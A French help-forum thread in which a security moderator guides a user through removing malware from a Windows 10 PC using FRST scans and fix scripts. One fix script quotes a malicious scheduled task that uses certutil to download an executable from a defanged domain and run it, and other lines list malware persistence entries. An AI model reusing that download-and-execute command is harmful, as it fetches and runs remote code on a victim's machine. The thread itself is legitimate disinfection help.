Virus ordi / csrss.exe [Résolu]

Signaler
Messages postés
19
Date d'inscription
mardi 23 juillet 2019
Statut
Membre
Dernière intervention
2 juin 2020
-
Messages postés
28228
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
25 octobre 2020
-
Bonjour à tous !

J'ai voulu cet après-midi, essayer un logiciel qui était payant (étant donné que je ne voulais l'utiliser que quelques heures je n'avais pas envie de payer). Et bon bah... ce qui devait arriver, arriva: j'ai réussi à récupérer un superbe virus. Le soucis étant que je n'ai aucune idée de comment le (les, je pense qu'il y en a plusieurs) retirer. Certains des programmes lancés ne sont pas stoppables, ils se relancent dans la seconde. De même, windows defender a été neutralisé (c'est pour ça que je ne m'en suis pas rendu compte tout de suite) et avec, ma connexion internet a été trèèès fortement ralentie, si ce n'est arrêtée. J'ai heureusement un second pc qui peut me permettre de transférer les logiciels dont j'ai besoin pour retirer le malware.


Voici du coup une petite capture des processus lancés au démarrage. J'en ai d'ordinaire qu'une toute petite dizaine. Au délà du fait que ça soit bien fait pour moi, il va de soit que je suis preneur d'un petit coup de main pour le virer. L'un des malwares lancés est csrss.exe et j'ai vu qu'il y avait un autre topic (très récent d'ailleurs) mais je ne sais pas si il est valide ou non pour supprimer tout ce qui a été installé.

Ma machine tourne sous Windows 10.

Merci d'avance à toutes celles et ceux qui m'aideront !

5 réponses

Messages postés
28228
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
25 octobre 2020
10 694
Bonsoir,
Télécharge FRST une fois téléchargé enregistre-le sur le bureau puis ouvre-le tu auras ceci :

Puis coche la case shortcut comme ceci :

Clique sur Analyser à la fin de l'analyse tu auras trois fichiers texte sur le bureau FRST, Addition et Shortcut , attention de bien attendre que les messages disant que l'analyse est terminée s'affichent, ensuite envoie ces rapports sur https://pjjoint.malekal.com/ voir ce tutoriel paragraphe Envoyer les rapports d’analyse sur pjjoint puis donne les trois liens générés par Pjoint dans ton prochain message.
Messages postés
19
Date d'inscription
mardi 23 juillet 2019
Statut
Membre
Dernière intervention
2 juin 2020

Très bien, je vois envoie ça tout de suite !
Messages postés
19
Date d'inscription
mardi 23 juillet 2019
Statut
Membre
Dernière intervention
2 juin 2020

Messages postés
28228
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
25 octobre 2020
10 694

Ton pc est bien infecté, quand la désinfection sera terminée tu devras impérativement changer tous tes mots de passe en ligne sans exception.

Procédure à faire dans l'ordre indiqué :

1- Ouvre FRST
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CreateRestorePoint:
CloseProcesses:
HKLM\...\Run: [Reimage] => C:\Program Files\Reimage\Reimage Protector\ReimageApp.exe [275168 2020-05-18] (Reimage LTD. -> reimage)
HKLM\...\RunOnce: [af1fgpwspmj] => C:\Program Files (x86)\Vxkz\627557203.exe [448000 2020-06-01] () [Fichier non signé]
HKLM\...\RunOnce: [ihnbli55hws] => C:\Program Files (x86)\Vxkz\354488692.exe [448000 2020-06-01] () [Fichier non signé]
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [711948] => C:\Users\Admin\AppData\Roaming\mipejgy2ss1\hp42eskrxtq.exe [1621610 2020-06-01] () [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [T99WBUKTJEK6EBY] => C:\Program Files\RSJTHBRDOE\RSJTHBRDO.exe [4098048 2020-06-01] (8C) [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [4388050] => C:\Users\Admin\AppData\Roaming\rifkvbzcisk\c40palx4st3.exe [1621610 2020-06-01] () [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [D7KPYPEWFFII2I6] => C:\Program Files\R06RNE4XY7\R06RNE4XY.exe [4098048 2020-06-01] (8C) [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [YoutubeDownloader] => C:\Users\Admin\AppData\Roaming\YoutubeDownloader\python\pythonw.exe [95760 2020-05-27] (Python Software Foundation -> Python Software Foundation) <==== ATTENTION
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [ColdCherry] => C:\WINDOWS\rss\csrss.exe [3945472 2020-06-01] () [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [7372559] => C:\Users\Admin\AppData\Roaming\oly5aumypk4\ulc2gigjcq0.exe [1621610 2020-06-01] () [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [5590495] => C:\Users\Admin\AppData\Roaming\sap2qka5l5h\g20ya4yut30.exe [1621610 2020-06-01] () [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [BJ1RT7COD4QKI1O] => C:\Program Files\H1B0Z3XK0L\H1B0Z3XK0.exe [4098048 2020-06-01] (8C) [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [LCIF284VYFIZA35] => C:\Program Files\4ZVHMF29YQ\4ZVHMF29Y.exe [4098048 2020-06-01] (8C) [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [6400097] => C:\Users\Admin\AppData\Roaming\yk3bzcghoam\gvmehj5hsld.exe [1621610 2020-06-01] () [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [2031886] => C:\Users\Admin\AppData\Roaming\n3fzocitbv4\cglg3ulidsp.exe [1621610 2020-06-01] () [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [3IVXT3DJH96QXAX] => C:\Program Files\32E8MFZOWA\32E8MFZOW.exe [4098048 2020-06-01] (8C) [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [24WAS8CIZE0Z90I] => C:\Program Files\UKQ0LG24L0\UKQ0LG24L.exe [4098048 2020-06-01] (8C) [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [7289453] => C:\Users\Admin\AppData\Roaming\eemszlbhexl\pueoyyrh4x4.exe [1621610 2020-06-01] () [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [7394478] => C:\Users\Admin\AppData\Roaming\tbzhh22hl2f\drhrk3ys24a.exe [1621610 2020-06-01] () [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [NWERQM3Q292HUP8] => C:\Program Files\OEKMLD95S0\OEKMLD95S.exe [4098048 2020-06-01] (8C) [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [0RIVK47KN68PQC4] => C:\Program Files\Q6AEXQC9GY\Q6AEXQC9G.exe [4098048 2020-06-01] (8C) [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [fnf0mi] => C:\Program Files (x86)\fnf0mi\fnf0mi.dll [15360 2020-06-01] () [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [3736574] => C:\Users\Admin\AppData\Roaming\eo4w1m1lhzx\s1kco3jnbh5.exe [1621610 2020-06-01] () [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [2013582] => C:\Users\Admin\AppData\Roaming\xooyvvqqsdr\ubn15m0bv25.exe [1621610 2020-06-01] () [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [2FZ5Y14FUVX52LF] => C:\Program Files\0FL44YRQ51\0FL44YRQ5.exe [4098048 2020-06-01] (8C) [Fichier non signé]
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [F8CRXBVI1VFT1KF] => C:\Program Files\753UUWSL0F\753UUWSL0.exe [4098048 2020-06-01] (8C) [Fichier non signé]
InternetURL: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\drf.url -> URL: "C:\Users\Admin\AppData\Roaming\drf\fWtfFgqkUg.vbs"
Startup: C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SmartClock.lnk [2020-06-01]
ShortcutTarget: SmartClock.lnk -> C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe (Avant Force) [Fichier non signé]
Task: {0D7C65C7-FF0C-4826-9D8C-6121D408AD54} - System32\Tasks\NvNgxUpdateCheckDaily_{A5ECD9C6-D9C6-D9C6-D9C6-A5ECD9C6D9C6} => C:\Users\Admin\AppData\Roaming\jjigrrt [156672 2019-09-12] ( () [Fichier non signé]) [Fichier en cours d'utilisation ]
Task: {12056B14-316F-42BB-9AF0-A8098B4AB4A3} - System32\Tasks\iwtae => C:\ProgramData\shfajew\iwtae.exe [142848 2020-06-01] () [Fichier non signé]
Task: {1A4A7CB8-AD70-4550-A45E-861D73B0B702} - System32\Tasks\Microsoft\Windows\WDI\SrvHost => rundll32.exe winscomrssrv.dll,SrvMainHost <==== ATTENTION
Task: {2D0ED2C6-2DAE-493B-AE86-C43E0FC2BD2C} - System32\Tasks\csrss => C:\WINDOWS\rss\csrss.exe [3945472 2020-06-01] () [Fichier non signé]
Task: {5211505C-48D3-4D93-AB57-2F5FFBC2BF06} - System32\Tasks\Microsoft\Windows\Windows Error Reporting\winrmsrv => C:\Windows\system32\winrmsrv.exe [731136 2020-04-05] (Microsoft Corporation) [Fichier non signé] <==== ATTENTION
Task: {53B097DE-23B8-421F-A7C1-5EED759A1E93} - System32\Tasks\Microsoft\Windows\Application Experience\StartupCheckLibrary => rundll32.exe StartupCheckLibrary.dll,DllMainRunLibrary <==== ATTENTION
Task: {53BB9905-F1C0-4FF4-9350-966FC0CE1BCE} - System32\Tasks\NvNgxUpdateCheckDaily_{78821544-1544-1544-1544-788215441544} => C:\Users\Admin\AppData\Roaming\tvigrrt [167936 2019-09-12] ( () [Fichier non signé]) [Fichier en cours d'utilisation ]
Task: {6CC862D1-1D4A-4109-A2AF-6815B553CC0B} - System32\Tasks\YoutubeDownloader => C:\Users\Admin\AppData\Roaming\YoutubeDownloader\python\pythonw.exe [95760 2020-05-27] (Python Software Foundation -> Python Software Foundation)
Task: {C0DF149F-B772-4AF2-B27E-47BC66C39FB3} - System32\Tasks\Microsoft\Windows\Windows Error Reporting\SysInfo => C:\Users\Admin\AppData\Roaming\\syshost\\sihost.exe [70144 2017-05-20] () [Fichier non signé]
Task: {D82D766B-EA96-4582-BB94-059415D48A3D} - System32\Tasks\Microsoft\Windows\Wininet\Winlogui => C:\Windows\system32\winlogui.exe [750592 2020-04-05] (Microsoft Corporation) [Fichier non signé]
Task: {E276A48B-7E65-40C2-8262-ED8E5FA12BA5} - System32\Tasks\Smart Clock => C:\Users\Admin\AppData\Roaming\Smart Clock\SmartClock.exe [933888 2020-06-01] (Avant Force) [Fichier non signé]
Task: C:\WINDOWS\Tasks\iwtae.job => C:\ProgramData\shfajew\iwtae.exe
R2 2172F756; C:\ProgramData\2172F756\B6D13B91.dll [4011008 2020-06-01] () [Fichier non signé]
R2 TermService; C:\WINDOWS\branding\mediasrv.png [55808 2014-11-11] (important) [Fichier non signé] <==== ATTENTION (pas de ServiceDLL)
R2 ReimageRealTimeProtector; C:\Program Files\Reimage\Reimage Protector\ReiGuard.exe [9073504 2020-02-19] (Reimage LTD. -> Reimage®)
C:\Program Files\Reimage
C:\ProgramData\Reimage Protector
C:\Users\Public\Desktop\PC Scan & Repair by Reimage.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Reimage Repair
C:\Program Files\Reimage
C:\rei
C:\WINDOWS\Reimage.ini
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\WthNoEU1.exe
C:\Users\Admin\AppData\Roaming\xooyvvqqsdr
C:\Users\Admin\AppData\Roaming\eo4w1m1lhzx
C:\Program Files\753UUWSL0F
C:\Program Files\0FL44YRQ51
C:\Users\Admin\AppData\Roaming\tbzhh22hl2f
C:\Users\Admin\AppData\Roaming\eemszlbhexl
C:\Program Files\Q6AEXQC9GY
C:\Program Files\OEKMLD95S0
C:\Users\Admin\AppData\Roaming\n3fzocitbv4
C:\Program Files\UKQ0LG24L0
C:\Program Files\32E8MFZOWA
C:\Users\Admin\AppData\Roaming\yk3bzcghoam
C:\Users\Admin\AppData\Roaming\67b5a00a703c
C:\Program Files\H1B0Z3XK0L
C:\Program Files\4ZVHMF29YQ
C:\Users\Admin\AppData\Roaming\sap2qka5l5h
C:\Users\Admin\AppData\Roaming\oly5aumypk4
C:\WINDOWS\system32\Tasks\NvNgxUpdateCheckDaily_{A5ECD9C6-D9C6-D9C6-D9C6-A5ECD9C6D9C6}
C:\ProgramData\2172F756
C:\Users\Admin\AppData\Roaming\erfddd.exe
C:\WINDOWS\system32\Tasks\Smart Clock
C:\Users\Admin\AppData\Roaming\Smart Clock
C:\Users\Admin\AppData\Roaming\rifkvbzcisk
C:\Users\Admin\AppData\Roaming\mipejgy2ss1
C:\Program Files\RSJTHBRDOE
C:\Program Files\R06RNE4XY7
C:\Program Files (x86)\fnf0mi
C:\Program Files (x86)\Vxkz
C:\WINDOWS\rss\csrss.exe
Hosts:
RemoveProxy:
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger.

Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
5- Réinitialise tes navigateurs internet https://www.commentcamarche.net/faq/26679-reinitialiser-son-navigateur

6- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT


7- Fait une nouvelle analyse FRST et poste les nouveaux rapports dans ta réponse


bazfile
Modérateur/Contributeur sécurité.
un bonjour, une réponse, un merci font toujours plaisir.
Messages postés
28228
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
25 octobre 2020
10 694 >
Messages postés
19
Date d'inscription
mardi 23 juillet 2019
Statut
Membre
Dernière intervention
2 juin 2020

Oui comme la première fois tu dois copier le code indiqué:
Start::
CloseProcesses:
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction
HKU\S-1-5-21-1723510311-4252272878-3066841640-1001\...\Run: [CloudNet] => "C:\Users\Admin\AppData\Roaming\67b5a00a703c\67b5a00a703c.exe"
C:\Users\Admin\AppData\Roaming\67b5a00a703c
R2 WinDefender; C:\WINDOWS\windefender.exe [1986560 2020-06-01] () [Fichier non signé]
C:\Windows\windefender.exe
RemoveProxy:
EmptyTemp:
End::
Messages postés
19
Date d'inscription
mardi 23 juillet 2019
Statut
Membre
Dernière intervention
2 juin 2020
>
Messages postés
28228
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
25 octobre 2020

Oui mais ma question est la suivante: Après avoir copié le code je dois le coller quelque part. Est-ce que je dois coller le script à la place du contenu de FRST.txt ou directement dans la case de saisie sur FRST ?
Messages postés
28228
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
25 octobre 2020
10 694 >
Messages postés
19
Date d'inscription
mardi 23 juillet 2019
Statut
Membre
Dernière intervention
2 juin 2020

Non il n'y a rien à coller, tu fais exactement comme la première fois, tu copies le script et ensuite tu cliques sur Corriger quand tu cliques sur Corriger c'est comme si tu faisais coller, suit mes indications à la lettre.
>
Messages postés
28228
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
25 octobre 2020

Ah, je pensais que le script était à placer quelque part.
Voici donc les nouveaux fichiers après la correction effectuée en mode "sans échec avec réseau":

FixLog - https://pjjoint.malekal.com/files.php?id=20200601_s14q12n6p12u11
FRST - https://pjjoint.malekal.com/files.php?id=FRST_20200601_7b13y11u14c9
Addition - https://pjjoint.malekal.com/files.php?id=20200601_q6e12j15t12g10
Shortcut - https://pjjoint.malekal.com/files.php?id=20200601_v10w87b15y10


L'onglet de sécurité Windows quant-à lui ne fonctionne toujours pas
Messages postés
28228
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
25 octobre 2020
10 694

La sécurité Windows fonctionne à nouveau ou pas ?

Procédure à faire dans l'ordre indiqué :

1- Ouvre FRST
2 - Copie l'intégralité du script qui est dans l'encadré qui suit :
Start::
CreateRestorePoint:
CloseProcesses:
Task: {96CD9826-D0EE-45F7-824B-1320230D1D4A} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxps://gfixprice.space/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340
C:\Users\Admin\AppData\Local\Konjob.exe
C:\Users\Admin\AppData\Local\Konjob.tst
C:\Users\Admin\AppData\Local\Tamptex.exe
C:\Users\Admin\AppData\Local\Tamptex.tst
EmptyTemp:
End::

3- Une fois le script copié clique sur Corriger.

Laisse la correction se faire une fois qu'elle est terminée il te sera demandé de redémarrer ton pc, fait-le dès que cela te sera demandé, voir ci-dessous.

Puis une fois ton ordinateur redémarré :
4- Tu auras un fichier Fixlog sur ton bureau envoie le via https://pjjoint.malekal.com/ puis met le lien généré par Pjoint dans ton prochain message.
5- Réinitialise tes navigateurs internet https://www.commentcamarche.net/faq/26679-reinitialiser-son-navigateur

6- VÉRIFIE ET DIS-MOI SI TON PROBLÈME EST TOUJOURS PRÉSENT


7- Fait une nouvelle analyse FRST et poste les nouveaux rapports dans ta réponse

Messages postés
19
Date d'inscription
mardi 23 juillet 2019
Statut
Membre
Dernière intervention
2 juin 2020

Messages postés
28228
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
25 octobre 2020
10 694
Ton pc est désinfecté, l'infection a endommagé le centre de sécurité de Windows, fait une réparation de Windows sans perte de données VOIR CETTE PAGE à partir du paragraphe Avec Media Creation Tool, cela aura aussi l'avantage de mettre à jour ta version de Windows qui ne l'est pas, attention cette réparation dure un certain temps.
Messages postés
19
Date d'inscription
mardi 23 juillet 2019
Statut
Membre
Dernière intervention
2 juin 2020
>
Messages postés
28228
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
25 octobre 2020

Je vais aller faire ça et vous recontacterai une fois la tâche terminée. Merci du temps que vous m'avez accordé. Je vous répondrai probablement demain. Encore merci et bonne journée/soirée !
Messages postés
28228
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
25 octobre 2020
10 694 >
Messages postés
19
Date d'inscription
mardi 23 juillet 2019
Statut
Membre
Dernière intervention
2 juin 2020

Bonne nuit.
Messages postés
19
Date d'inscription
mardi 23 juillet 2019
Statut
Membre
Dernière intervention
2 juin 2020
>
Messages postés
28228
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
25 octobre 2020

Bonjour,
Le centre de sécurité a bien été réparé. Merci encore du temps accordé et d'avoir résolu mon problème.
Bonne journée à vous.
Messages postés
28228
Date d'inscription
samedi 29 décembre 2012
Statut
Modérateur, Contributeur sécurité
Dernière intervention
25 octobre 2020
10 694 >
Messages postés
19
Date d'inscription
mardi 23 juillet 2019
Statut
Membre
Dernière intervention
2 juin 2020


Surtout n'oublie pas de changer tous tes mots de passe en ligne ils ont pu être dérobés.

Tu as désormais la nouvelle version de Windows 10 voir CETTE PAGE
Il n'y a plus d'infection active sur ton pc, mais pour terminer tu peux faire un scan du disque C avec ESET NOD32 Online Scanner il terminera de supprimer d'éventuels restes d'infection inactifs.

Bonne journée.